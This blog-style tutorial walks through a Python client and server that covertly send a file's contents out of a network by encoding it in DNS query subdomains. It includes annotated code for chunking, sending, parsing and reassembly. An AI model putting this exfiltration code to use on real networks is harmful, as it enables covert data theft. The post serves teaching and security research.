DNS Exfiltration With Python

John Burns

In this post, we dive into the mechanics behind a DNS exfiltration tool written in Python. This project demonstrates how data can be covertly transmitted via DNS queries. I built this client-server system to study DNS exfiltration techniques in a controlled, educational environment. Below, I detail the architecture and key design decisions, and provide annotated code snippets from both the client and server implementations.


1. Overview and Architecture

The project is divided into two main components:

  • Client (client.py): Reads a file, encodes its contents in base64, splits the encoded string into chunks, and embeds each chunk into the subdomain of a DNS query. Each query carries a unique identifier, a sequence number, and the total number of chunks.
  • Server (server.py): Listens for incoming DNS queries on a specified port, extracts the subdomain, decodes the base64 data, and reconstructs the original file once all chunks are received.

System Diagram

graph LR;
    A[Client: Reads & Encodes File] --> B[Splits Data into Chunks];
    B --> C[Embeds Chunks in DNS Queries];
    C --> D[DNS Network];
    D --> E[Server: Listens on UDP Port];
    E --> F[Extracts & Decodes Data];
    F --> G[Reconstructs Original File];

2. Client Implementation

The client reads a file, encodes its contents in base64, and splits the encoded data into manageable chunks. DNS queries are then constructed with a subdomain that includes a unique session identifier, sequence information, and the chunk data.

2.1. Base64 Encoding and Chunking

To keep the data DNS safe, the file contents are encoded using base64. Because a DNS label cannot exceed 63 characters, each chunk must fit in whatever space remains after the identifier and sequence metadata. The encoding and chunking helpers look like this:

import base64

def encode_file_contents(file_path):
    """Read a file and return its contents as URL-safe base64 text."""
    with open(file_path, 'rb') as file:
        file_data = file.read()
    # urlsafe_b64encode already emits '-' and '_' in place of '+' and '/',
    # so no further character replacement is needed.
    return base64.urlsafe_b64encode(file_data).decode('ascii')

def chunk_data(data, size):
    """Yield successive chunks of at most `size` characters from data."""
    for i in range(0, len(data), size):
        yield data[i:i + size]

Why these choices?

  • Base64 Encoding: Converts binary data into an ASCII representation. The URL-safe variant emits ‘-’ and ‘_’ in place of ‘+’ and ‘/’, so the encoded data can form part of a DNS subdomain. Any trailing ‘=’ padding is still part of the encoded output.
  • Chunk Size Calculation: The client calculates the maximum allowed length for each chunk by subtracting the space taken by a unique identifier and sequence metadata. This prevents DNS label length violations (the 63-character limit).
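
The size calculation itself is not shown in the snippet above, so here is a minimal sketch of one way it could be done. The helper name max_chunk_length is hypothetical, and the label layout is assumed to be <identifier>-<segment_index>-<total_segments>-<chunk_data>. Rounding the size down to a multiple of four is an extra assumption of this sketch: it keeps every chunk a whole number of base64 groups, so each one can be decoded on its own.

```python
import math

MAX_LABEL_LENGTH = 63  # RFC 1035 limit on a single DNS label


def max_chunk_length(identifier: str, encoded_length: int) -> int:
    """Return the largest chunk size that keeps every label within 63 characters.

    Hypothetical helper; assumes the label layout
    <identifier>-<segment_index>-<total_segments>-<chunk_data>.
    """
    for digits in range(1, 10):
        # Three '-' separators plus two counters of at most `digits` digits each.
        overhead = len(identifier) + 3 + 2 * digits
        size = MAX_LABEL_LENGTH - overhead
        # Assumption: round down to a multiple of 4 so each chunk is a whole
        # number of base64 groups and can be decoded independently.
        size -= size % 4
        if size <= 0:
            break
        total = math.ceil(encoded_length / size)
        # Accept this size only if the chunk count fits in the reserved digits.
        if len(str(max(total, 1))) <= digits:
            return size
    raise ValueError("identifier too long or payload too large for one label")


print(max_chunk_length("a1b2c3d4", 1000))
```

The loop exists because the overhead depends on how many digits the chunk count needs, and the chunk count in turn depends on the chunk size. Trying one digit first and widening only when necessary resolves that circular dependency.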

2.2. Constructing and Sending DNS Queries

Each DNS query is built using the dnslib library. The subdomain is structured as follows:

<identifier>-<segment_index>-<total_segments>-<chunk_data>.<domain>

Here’s the relevant snippet:

import socket
from dnslib import DNSRecord, DNSQuestion, QTYPE

def send_dns_query(subdomain, args):
    """Send one DNS A query for <subdomain>.<domain> and print any response."""
    query = DNSRecord(q=DNSQuestion(f"{subdomain}.{args.domain}", QTYPE.A))
    query_data = query.pack()  # Serialize to DNS wire format
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.settimeout(2)  # Seconds to wait for the server's reply
        sock.sendto(query_data, (args.server_ip, args.server_port))
        response, _ = sock.recvfrom(1024)
        print("Received response:", DNSRecord.parse(response))
    except socket.timeout:
        print("No response received.")
    finally:
        sock.close()

Design Considerations:

  • Timeout Handling: A two-second timeout is set to prevent the client from hanging if no response is received.
  • Unique Identifier: A unique identifier (generated with uuid4) is prepended to the data chunk. This helps the server to collate chunks belonging to the same session.
  • DNS Query Construction: The use of DNSRecord and DNSQuestion from dnslib simplifies DNS packet creation.
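
To make the label layout concrete, the sketch below builds the full query names for a small payload. It is illustrative only: build_query_names is a hypothetical helper, the zero-based segment index is an assumption, and so is the identifier format. The post does not show how the uuid4 value is formatted, so this sketch takes the first eight hex characters, which contain no hyphens. A full str(uuid4()) does contain hyphens and would collide with the '-' separators.

```python
import uuid


def build_query_names(encoded: str, chunk_size: int, domain: str) -> list[str]:
    """Return one fully qualified query name per chunk of `encoded`."""
    # Assumption: a short hex identifier with no '-', so the server can split
    # the label on its first three hyphens without ambiguity.
    identifier = uuid.uuid4().hex[:8]
    chunks = [encoded[i:i + chunk_size] for i in range(0, len(encoded), chunk_size)]
    total = len(chunks)
    names = []
    for index, chunk in enumerate(chunks):
        label = f"{identifier}-{index}-{total}-{chunk}"
        if len(label) > 63:
            raise ValueError(f"label for chunk {index} is {len(label)} characters")
        names.append(f"{label}.{domain}")
    return names


names = build_query_names("QUJDREVGR0hJSktM", 8, "example.com")
for name in names:
    print(name)
```

Each printed name could then be passed to a sender such as send_dns_query, one query per chunk.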

3. Server Implementation

The server listens for UDP packets on a specified port and processes incoming DNS queries. It extracts the embedded data from the subdomain, decodes it, and reassembles the file once all parts are received.

3.1. Parsing the DNS Query

The server uses custom parsing to extract the domain name and then splits the subdomain to recover the unique identifier, sequence number, total segments, and the encoded chunk:

def parse_dns_query_section(data):
    """Return the queried name from a raw DNS packet, or False if malformed."""
    offset = 12  # Start after the fixed 12-byte DNS header
    labels = []
    try:
        while True:
            length = data[offset]  # Each label is prefixed by its length
            if length == 0:
                break  # A zero byte terminates the name
            offset += 1  # Move past the length byte
            label = data[offset:offset + length]
            labels.append(label.decode('ascii'))
            offset += length
        return '.'.join(labels)
    except (IndexError, UnicodeDecodeError):
        # Truncated packet or non-ASCII label
        return False

Key Points:

  • Manual DNS Parsing: dnslib handles the complete packet when building responses, but for incoming queries the server parses the question section by hand and extracts only the name, which is all it needs for data exfiltration.
  • Error Handling: Basic error handling is included to avoid crashes when encountering malformed DNS queries.
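
The wire format that the parser walks can be illustrated with a small round trip using only the standard library. This is a sketch, not the server's code: encode_qname and decode_qname are hypothetical names, and the 12-byte header is a zero-filled placeholder, since only its length matters for finding the question section.

```python
def encode_qname(name: str) -> bytes:
    """Encode a dotted name as length-prefixed labels ending in a zero byte."""
    out = bytearray()
    for label in name.split('.'):
        raw = label.encode('ascii')
        if not 0 < len(raw) <= 63:
            raise ValueError(f"invalid label length: {len(raw)}")
        out.append(len(raw))
        out += raw
    out.append(0)
    return bytes(out)


def decode_qname(packet: bytes, offset: int = 12) -> str:
    """Walk the labels starting at `offset` (12 skips the fixed DNS header)."""
    labels = []
    while True:
        length = packet[offset]
        if length == 0:
            break
        if length > 63:
            # Values above 63 are compression pointers or reserved;
            # this sketch does not follow them.
            raise ValueError("compressed or invalid label")
        offset += 1
        labels.append(packet[offset:offset + length].decode('ascii'))
        offset += length
    return '.'.join(labels)


header = bytes(12)  # placeholder header; only its length matters here
# Question section: encoded name, then QTYPE=A (1) and QCLASS=IN (1).
question = encode_qname("ab12-0-2-QUJD.example.com") + b"\x00\x01\x00\x01"
print(decode_qname(header + question))
```

Rejecting length bytes above 63 is a small hardening step over a plain label walk: a query name in a normal request is not compressed, so such a byte usually signals a malformed or hostile packet.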

3.2. Processing and Reassembling Data

Once the subdomain is parsed, the server decodes the base64 chunk and stores it in a dictionary keyed by the unique identifier. When all chunks for a session have been received, the file is reassembled:

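import base64
from collections import defaultdict

# Module-level state, shown for completeness (shapes assumed from usage below)
expected_counts = {}                # identifier -> total number of chunks
data_fragments = defaultdict(dict)  # identifier -> {segment_index: bytes}

def process_query(domain_name):
    parts = domain_name.split('.')
    identifier_segment = parts[0]
    try:
        # The chunk itself may contain '-', so split on the first three only
        identifier, segment_index, total_segments, encoded_data = identifier_segment.split('-', 3)
        index = int(segment_index)
        total = int(total_segments)
    except ValueError:
        print(f"Ignoring query without exfiltration fields: {domain_name}")
        return
    print(f"Received encoded data: {encoded_data}")  # Debug print
    try:
        decoded_data = base64.urlsafe_b64decode(encoded_data + '==')
    except Exception as e:
        print(f"Error decoding data: {e}")
        return
    expected_counts[identifier] = total
    data_fragments[identifier][index] = decoded_data
    if len(data_fragments[identifier]) == total:
        # save_data is defined elsewhere in server.py
        save_data(identifier, data_fragments[identifier])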

Why these choices?

  • Dictionary for Fragment Storage: Using a defaultdict allows the server to dynamically store and index each data chunk by its sequence number.
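  • Base64 Padding: The code appends '==' before decoding so that a chunk with missing padding can still be decoded. This only yields the right bytes when every chunk except the last is a multiple of four characters long: base64 maps each group of four characters to three bytes, so a chunk that ends mid-group cannot be decoded correctly on its own.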
  • Chunk Reassembly: Once the expected number of fragments is reached, the server concatenates them in order and writes the output to a file.
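
The save_data helper is not shown in this post, so the following is only a sketch of the reassembly step under stated assumptions. decode_chunk and reassemble are hypothetical names, the chunk size is assumed to be a multiple of four, and the padding is computed exactly rather than appended as a fixed '=='.

```python
import base64


def decode_chunk(chunk: str) -> bytes:
    """Decode one URL-safe base64 chunk, restoring exactly the padding it needs."""
    padding = '=' * (-len(chunk) % 4)
    return base64.urlsafe_b64decode(chunk + padding)


def reassemble(fragments: dict[int, bytes]) -> bytes:
    """Join decoded fragments in ascending index order."""
    return b''.join(fragments[index] for index in sorted(fragments))


original = b"covert channel demo payload"
encoded = base64.urlsafe_b64encode(original).decode('ascii').rstrip('=')
chunk_size = 8  # a multiple of 4, so every chunk decodes independently
chunks = [encoded[i:i + chunk_size] for i in range(0, len(encoded), chunk_size)]

# Store fragments in reverse to mimic out-of-order arrival.
fragments = {}
for index in reversed(range(len(chunks))):
    fragments[index] = decode_chunk(chunks[index])

print(reassemble(fragments))
```

Sorting by index at the end means arrival order does not matter, which is the property the sequence numbers are there to provide.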

3.3. Rate Limiting with Random Delays

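Before responding to a DNS query, the server waits for a randomized delay (configured via command-line parameters). Because the client blocks until it receives a response or times out, delaying each response also slows the rate at which a client sending chunks one at a time can issue queries: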

pause_time = random.randint(args.low, args.high)
time.sleep(pause_time / 1000)

Rationale:

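  • Rate Limiting: Spacing out responses keeps the query rate low, which reduces the load on any DNS infrastructure (or recursive chain) between client and server. It’s especially useful during testing on a local network.
  • Configurable Delay: Command-line parameters allow you to adjust the minimum (--low) and maximum (--high) delay in milliseconds. Keep --high below the client’s two-second timeout (2000 ms); otherwise the client gives up waiting and reports that no response was received.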
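
A minimal sketch of how the two options might be parsed and applied is shown below. The --low and --high flag names come from the post; the default values, the validation, and the helper names parse_delay_args and pick_delay_seconds are assumptions made for illustration.

```python
import argparse
import random
import time


def parse_delay_args(argv=None):
    """Parse the --low/--high delay options, both in milliseconds."""
    parser = argparse.ArgumentParser(description="DNS server delay options (sketch)")
    # Default values are hypothetical; the post does not state them.
    parser.add_argument("--low", type=int, default=100, help="minimum delay in ms")
    parser.add_argument("--high", type=int, default=1500, help="maximum delay in ms")
    args = parser.parse_args(argv)
    if args.low < 0 or args.high < args.low:
        parser.error("--low must be >= 0 and --high must be >= --low")
    return args


def pick_delay_seconds(low_ms: int, high_ms: int) -> float:
    """Pick a random delay in seconds; randint includes both endpoints."""
    return random.randint(low_ms, high_ms) / 1000


args = parse_delay_args(["--low", "5", "--high", "20"])
delay = pick_delay_seconds(args.low, args.high)
time.sleep(delay)  # the server would sleep here before sending its reply
print(f"slept for {delay * 1000:.0f} ms")
```

Validating the range up front matters because random.randint raises ValueError when the lower bound exceeds the upper bound, which would otherwise surface only when the first query arrives.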

4. Why Certain Options Were Chosen

  • dnslib Library: Both client and server use dnslib for handling DNS queries and responses. This library offers a lightweight way to pack and parse DNS packets without reinventing the wheel.
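  • Base64 Encoding with URL-Safe Variants: Hostname labels are conventionally limited to letters, digits, and hyphens. URL-safe base64 stays close to that set: it avoids ‘+’ and ‘/’, and although the underscore falls outside the hostname convention, it is widely accepted in DNS names.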
  • Unique Identifiers and Sequence Numbers: These elements are embedded in each DNS query to allow the server to correctly reassemble the transmitted file, even if packets arrive out of order.
  • Manual DNS Packet Parsing: dnslib constructs the responses, but the server only needs the query name from each incoming packet, since that is where the client places the exfiltrated data. Walking the question section by hand extracts the encoded data directly from the subdomain.
  • Randomized Response Delay: To simulate real-world latency and keep the query rate down, the server adds a random delay to responses. This is configurable, making the tool adaptable for different testing environments.

5. Conclusion

This DNS exfiltration tool demonstrates how data can be transferred covertly using DNS queries. By leveraging Python and the dnslib library, the project encodes file data into DNS subdomains, sends them over the network, and reassembles the original file on the server side.

While this project is intended for educational purposes, it provides valuable insights into how covert channels can be established using standard protocols. Always remember to use such techniques responsibly and only in environments where you have explicit permission to test.

Happy coding and secure research!


Disclaimer: This tool is for educational purposes only. Unauthorized use on networks or systems without permission is illegal and unethical.

Feel free to contribute or suggest improvements by forking the repository on GitHub: python-dns-exfiltration-client-server.